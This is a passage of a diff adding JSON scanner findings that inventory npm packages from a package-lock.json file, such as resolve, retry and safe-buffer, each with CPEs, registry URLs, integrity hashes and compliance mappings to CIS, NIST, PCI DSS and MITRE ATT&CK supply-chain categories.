"/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:require-main-filename:require-main-filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require-main-filename:require_main_filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_main_filename:require-main-filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_main_filename:require_main_filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require-main:require-main-filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require-main:require_main_filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_main:require-main-filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_main:require_main_filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require:require-main-filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require:require_main_filename:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/require-main-filename@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz", + "integrity": "sha512-NKN5kMDylKuldxYLSUfrbo5Tuzh4hd+2E8NPPX02mZtn1VuREQToYe/ZdlJy+J3uCpfaiGF05e7B8W0iXbQHmg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b3700e9b1b03966b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: resend 3.5.0", + "title": "resend 3.5.0", + "description": "Package discovered: resend 3.5.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c52cdc280efaa4d0", + "name": "resend", + "version": "3.5.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:resend:resend:3.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/resend@3.5.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/resend/-/resend-3.5.0.tgz", + "integrity": "sha512-bKu4LhXSecP6krvhfDzyDESApYdNfjirD5kykkT1xO0Cj9TKSiGh5Void4pGTs3Am+inSnp4dg0B5XzdwHBJOQ==", + "dependencies": { + "@react-email/render": "0.0.16" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7be6d0329d7fce71", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: resolve 1.22.12", + "title": "resolve 1.22.12", + "description": "Package discovered: resolve 1.22.12", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2e445c7ed78482c1", + "name": "resolve", + "version": "1.22.12", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:resolve:resolve:1.22.12:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/resolve@1.22.12", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.12.tgz", + "integrity": "sha512-TyeJ1zif53BPfHootBGwPRYT1RUt6oGWsaQr8UyZW/eAm9bKoijtvruSDEmZHm92CwS9nj7/fWttqPCgzep8CA==", + "dependencies": { + "es-errors": "^1.3.0", + "is-core-module": "^2.16.1", + "path-parse": "^1.0.7", + "supports-preserve-symlinks-flag": "^1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3f98609d8855980b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: restructure 3.0.2", + "title": "restructure 3.0.2", + "description": "Package discovered: restructure 3.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "05272d1e7e2ad4be", + "name": "restructure", + "version": "3.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:restructure:restructure:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/restructure@3.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/restructure/-/restructure-3.0.2.tgz", + "integrity": "sha512-gSfoiOEA0VPE6Tukkrr7I0RBdE0s7H1eFCDBk05l1KIQT1UIKNc5JZy6jdyW6eYH3aR3g5b3PuL77rq0hvwtAw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b7f5c38e4c9ed33f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: retry 0.13.1", + "title": "retry 0.13.1", + "description": "Package discovered: retry 0.13.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b8be0fab008ab183", + "name": "retry", + "version": "0.13.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:retry:retry:0.13.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/retry@0.13.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/retry/-/retry-0.13.1.tgz", + "integrity": "sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b8976a72aaa61b4d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: retry-request 7.0.2", + "title": "retry-request 7.0.2", + "description": "Package discovered: retry-request 7.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "672814322994feff", + "name": "retry-request", + "version": "7.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:retry-request:retry-request:7.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:retry-request:retry_request:7.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:retry_request:retry-request:7.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:retry_request:retry_request:7.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:retry:retry-request:7.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:retry:retry_request:7.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/retry-request@7.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz", + "integrity": "sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==", + "dependencies": { + "@types/request": "^2.48.8", + "extend": "^3.0.2", + "teeny-request": "^9.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0d600ce535ab6bd3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: reusify 1.1.0", + "title": "reusify 1.1.0", + "description": "Package discovered: reusify 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "456353a253e18966", + "name": "reusify", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:reusify:reusify:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/reusify@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.1.0.tgz", + "integrity": "sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3a557f6b562fa305", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: run-parallel 1.2.0", + "title": "run-parallel 1.2.0", + "description": "Package discovered: run-parallel 1.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ca5a4d8be889885f", + "name": "run-parallel", + "version": "1.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:run-parallel:run-parallel:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:run-parallel:run_parallel:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:run_parallel:run-parallel:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:run_parallel:run_parallel:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:run:run-parallel:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:run:run_parallel:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/run-parallel@1.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", + "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", + "dependencies": { + "queue-microtask": "^1.2.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0d59c1e836c63d4a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: safe-buffer 5.1.2", + "title": "safe-buffer 5.1.2", + "description": "Package discovered: safe-buffer 5.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "36d9a8484ed180a6", + "name": "safe-buffer", + "version": "5.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:safe-buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe-buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe_buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe_buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe:safe-buffer:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe:safe_buffer:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/safe-buffer@5.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", + "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": 